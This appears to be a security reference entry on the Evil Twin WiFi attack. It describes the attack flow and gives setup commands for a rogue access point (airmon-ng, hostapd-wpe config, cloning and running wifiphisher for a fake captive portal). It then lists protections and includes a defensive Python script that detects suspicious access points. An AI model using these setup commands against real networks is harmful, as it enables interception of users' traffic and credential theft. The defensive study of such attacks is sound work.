High Severity | T1550
👻 Evil Twin Attack
🧠 Description
The Evil Twin attack creates a fake WiFi access point that mimics a legitimate network. When users connect, all their traffic can be intercepted, including credentials and sensitive data.
Attack Flow:
- Attacker creates access point with same SSID as legitimate network
- Victims are deauthenticated from legitimate AP
- Victims auto-connect to evil twin
- All traffic passes through attacker's machine
⚙️ Setup
    # Enable monitor mode
    airmon-ng start wlan0

    # Create bridge for internet sharing
    brctl addbr br0
    brctl addif br0 eth0

    # Configure hostapd-wpe (802.1X AP)
    # Edit hostapd-wpe.conf
    interface=wlan0mon
    ssid=FreeWiFi
    driver=nl80211

    # Start hostapd-wpe
    hostapd-wpe hostapd-wpe.conf
🎣 Captive Portal Hijack
    # Create fake captive portal
    # Use fluxion or wifiphisher
    git clone https://github.com/wifiphisher/wifiphisher
    cd wifiphisher && python3 wifiphisher

    # Or create manually with apache
    # /var/www/html/login.php
🛡️ Protection
- 802.1X (Enterprise WiFi): Certificate-based authentication
- VPN: Always use VPN on public networks
- HSTS: Prevents credential interception via SSL stripping
- Verify Network: Check MAC address, signal strength
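The "Verify Network" check above can be automated on a fixed sensor. The following is an added example, not code from the original page: it compares scan results against a baseline of known access points and flags beacons that reuse a protected SSID with an unknown MAC address, different security settings, or an unusual signal level. The baseline, SSID names, MAC addresses and the 15 dB tolerance are constructed assumptions.

```python
"""Flag possible evil twins in Wi-Fi scan results (defensive check)."""
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str       # AP MAC address as seen in the beacon
    security: str    # e.g. "WPA2-Enterprise", "Open"
    signal_dbm: int  # received signal strength at the sensor

# Assumed baseline of known-good APs per protected SSID (constructed values).
# Each BSSID maps to the signal level the fixed sensor normally sees for it.
BASELINE = {
    "CorpWiFi": {
        "security": "WPA2-Enterprise",
        "aps": {"02:00:00:aa:bb:01": -62, "02:00:00:aa:bb:02": -71},
    },
}
SIGNAL_TOLERANCE_DB = 15  # assumed threshold; tune per site

def find_suspects(beacons, baseline=BASELINE, tolerance=SIGNAL_TOLERANCE_DB):
    """Return (bssid, reason) for beacons using a protected SSID that fail a check."""
    findings = []
    for b in beacons:
        known = baseline.get(b.ssid)
        if known is None:
            continue  # not an SSID we protect
        bssid = b.bssid.lower()
        if b.security != known["security"]:
            findings.append((bssid, "security mismatch"))
        elif bssid not in known["aps"]:
            findings.append((bssid, "unknown BSSID"))
        elif abs(b.signal_dbm - known["aps"][bssid]) > tolerance:
            # A cloned MAC still tends to show up at a different signal level.
            findings.append((bssid, "signal anomaly"))
    return findings

# Constructed sample scan from a fixed sensor.
SAMPLE_SCAN = [
    Beacon("CorpWiFi", "02:00:00:AA:BB:01", "WPA2-Enterprise", -60),  # legitimate
    Beacon("CorpWiFi", "02:00:00:cc:dd:99", "WPA2-Enterprise", -40),  # unknown MAC
    Beacon("CorpWiFi", "02:00:00:aa:bb:02", "Open", -70),             # downgraded
    Beacon("CorpWiFi", "02:00:00:aa:bb:02", "WPA2-Enterprise", -35),  # MAC match, too strong
    Beacon("CoffeeShop", "02:00:00:ee:ff:10", "Open", -55),           # not protected
]

if __name__ == "__main__":
    for bssid, reason in find_suspects(SAMPLE_SCAN):
        print(f"ALERT {bssid}: {reason}")
```

Signal strength varies with environment, so treat a signal anomaly as a prompt to investigate rather than as proof on its own.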